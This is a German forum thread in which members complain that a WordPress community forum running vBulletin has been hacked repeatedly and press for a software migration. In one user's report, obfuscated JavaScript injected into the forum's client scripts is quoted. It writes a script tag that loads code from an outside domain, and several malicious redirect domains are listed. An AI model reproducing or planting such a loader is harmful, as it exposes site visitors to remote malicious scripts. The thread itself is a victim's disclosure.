Forum total verseucht

Edi · December 21, 2017 at 1:49 PM

Mittlerweile ist das Forum total verseucht...

Ich bin dann mal weg, bis es wieder vernünftig verwendet werden kann.

FloRet · December 21, 2017 at 2:00 PM

Hallo,

Mit diesen Gedanken spiele ich auch schon seit einiger Zeit! :-(
Keine SSL Verschlüsselung, dauernde Kaspersky Meldungen zu irgendwelchen Dubiosen Scripten!

Das macht keinen Spaß mehr!!
Auch die Rückmeldungen seitens des Betreibers sind ernüchternd mangelhaft!

WANN, kommt die neue Forensoftware? WANN kommt ein SSL Zertifikat? WANN.....

Beste grüße

maxe · December 21, 2017 at 3:03 PM

den Gedanken hatte ich tatsächlich auch schon mal (öfter), von daher total verständlich.

Olaf · December 21, 2017 at 6:16 PM

Ich kann jeden verstehen den die Situation nervt, geht mir genau so und ich hoffe in Kürze eine Lösung anbieten zu können. Der technische Admin ist mitunter schwer zu erreichen, aber derzeit wird zügig auf einen neuen Hack reagiert. Kern des Problems ist vB und demnächst satteln wir auf XenForo um. Erste Tests stehen an und sobald die Feiertage durch sind gehts an die finale Migration. Ich bitte euch um noch ein wenig Geduld...

Vielen Dank und beste Grüsse
Olaf

JABA-Hosting · December 21, 2017 at 6:33 PM

Quote from Olaf

Ich kann jeden verstehen den die Situation nervt, geht mir genau so und ich hoffe in Kürze eine Lösung anbieten zu können. Der technische Admin ist mitunter schwer zu erreichen, aber derzeit wird zügig auf einen neuen Hack reagiert. Kern des Problems ist vB und demnächst satteln wir auf XenForo um. Erste Tests stehen an und sobald die Feiertage durch sind gehts an die finale Migration. Ich bitte euch um noch ein wenig Geduld...
Vielen Dank und beste Grüsse
Olaf

Es gibt doch hier jede Menge Firmen die die Migration doch übernehmen könnten.

Alphawolf · December 24, 2017 at 1:42 PM

Quote from Olaf

Kern des Problems ist vB und demnächst satteln wir auf XenForo um.

Ich würde eher auf Discourse gehen, wofür es auch Importer für vbulletin gibt. Finde das Discourse-System denkt das (etwas angestaubte System von Foren) am besten weiter.

Ansonsten Hallo und Frohes Fest an alle! ;)

b3317133 · December 26, 2017 at 11:00 PM

Heute ist die Datei forum.wpde.org/clientscript/vbulletin_md5.js?v=425 verseucht, der Code am Ende der Datei ab [FONT=courier new]var _0x142f=[/FONT]... verlinkt (nach "Entschlüsselung") auf ein externes Script von der Domain [FONT=courier new]jurtym.cf[/FONT] ... :-(

Code

... var _0x142f=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6A\x75\x72\x74\x79\x6D\x2E\x63\x66\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];var _0xb0e7=[_0x142f[0],_0x142f[1]];var _0x2490=[_0xb0e7[0],_0xb0e7[1]];var _0x9cd3=[_0x2490[0],_0x2490[1]];var _0x2f93=[_0x9cd3[0],_0x9cd3[1]];document[_0x2f93[1]](_0x2f93[0])

Code

<script src="//jurtym.cf"></script>

borusse · December 27, 2017 at 10:27 AM

Wenn bei jemandem die WP Seite verseucht ist, wird ihm geraden die Seite vom Netz zu nehmen bis der Schaden behoben ist. Sollte man dies dann in dem Fall hier nicht auch tun :confused:. ;)

b3317133 · December 27, 2017 at 10:54 AM

Quote from borusse

Sollte man dies dann in dem Fall hier nicht auch tun :confused:.

Aus meiner Sicht schon.

KerstinMe · January 2, 2018 at 3:37 PM

Quote from FloRet

Hallo,
Mit diesen Gedanken spiele ich auch schon seit einiger Zeit! :-(
Keine SSL Verschlüsselung, dauernde Kaspersky Meldungen zu irgendwelchen Dubiosen Scripten!
Das macht keinen Spaß mehr!!
Auch die Rückmeldungen seitens des Betreibers sind ernüchternd mangelhaft!
WANN, kommt die neue Forensoftware? WANN kommt ein SSL Zertifikat? WANN.....
Beste grüße

Hi,

ich hatte bisher noch keine Probleme hier im Forum... bin aber auch ziemlich neu hier mit dabei.
Ein SSL Zertifikat finde ich persönlich nicht unbedingt für ein solches Forum notwendig.

b3317133 · January 10, 2018 at 10:17 AM

Und schon wieder ist das Forum gehackt.

Bösartiger Code am Ende der Datei forum.wpde.org/clientscript/vbulletin_read_marker.js?v=425 lädt scripts von http://oei1.gq/ bzw. htp://mfio.cf/ bzw. https://go.onclasrv.com/ bzw. https://deloton.com/ bzw. https://go.mobtrks.com/ nach und leitet auf Trojaner-Seiten weiter.

Quote

var _0x3763=["\x3C\x73\x63\x72\x69\x70\x74\ ... x74\x65"];var _0x9473=[_0x3763[0],_0x3763[1]];var _0x6095=[_0x9473[0],_0x9473[1]];var _0xd944=[_0x6095[0],_0x6095[1]];var _0x76bb=[_0xd944[0],_0xd944[1]];var _0x38cf=[_0x76bb[0],_0x76bb[1]];var _0xc93a=[_0x38cf[0],_0x38cf[1]];document[_0xc93a[1]](_0xc93a[0])

Offenbar gibt es derzeit also keinerlei Interesse, das Forum sicherer zu machen. :sad:

Olaf · January 10, 2018 at 2:45 PM

Danke, ist schon gefixt. Wir sind dran..

FloRet · January 10, 2018 at 3:32 PM

Hallo Olaf!

Ich bin begeistert, dass zwar die Bereinigung sehr schnell von statten geht,
aber der "Umzug" auf eine aktuellere, sichere Forensoftware, Monate wenn nicht schon über 1 Jahr dauert.

Wenn man "möchte", könnte man das innerhalb 1-2 Wochen problemlos durchführen, und nach und nach alle "Feinarbeiten" nachreichen bzw. auf das Feedback der User warten um evtl. Probleme aufzuzeigen und damit beheben zu können!

Ein Team aus 1-2-3 Leuten wird nie zu 100% alle Fehler finden und deshalb ist es eher nicht aussichtsvoll die User hin zu halten, bis vielleicht gar keiner mehr hier ist - Dieser Fehler ist schon mehreren Foren zu Verhängnis geworden und Blogs haben dieses abgelöst...

LG

b3317133 · January 10, 2018 at 3:51 PM

Es ist trotz aller Bemühungen offenbar erneut ein Einbruch gelungen. Das kann und darf keinesfalls irgendeine Art von Begeisterung auslösen.

danielgoehr · January 10, 2018 at 10:25 PM

Quote from Olaf

Kern des Problems ist vB und demnächst satteln wir auf XenForo um. Erste Tests stehen an und sobald die Feiertage durch sind gehts an die finale Migration.

Wie ist denn da der aktuelle Stand? Die Feiertage sind ja mittlerweile durch.

borusse · January 11, 2018 at 9:36 AM

Das nächste Weihnachten steht schon quasi vor der Tür.

Dear visitor, welcome! Create an account or sign in to comment

Forum total verseucht

Participate now!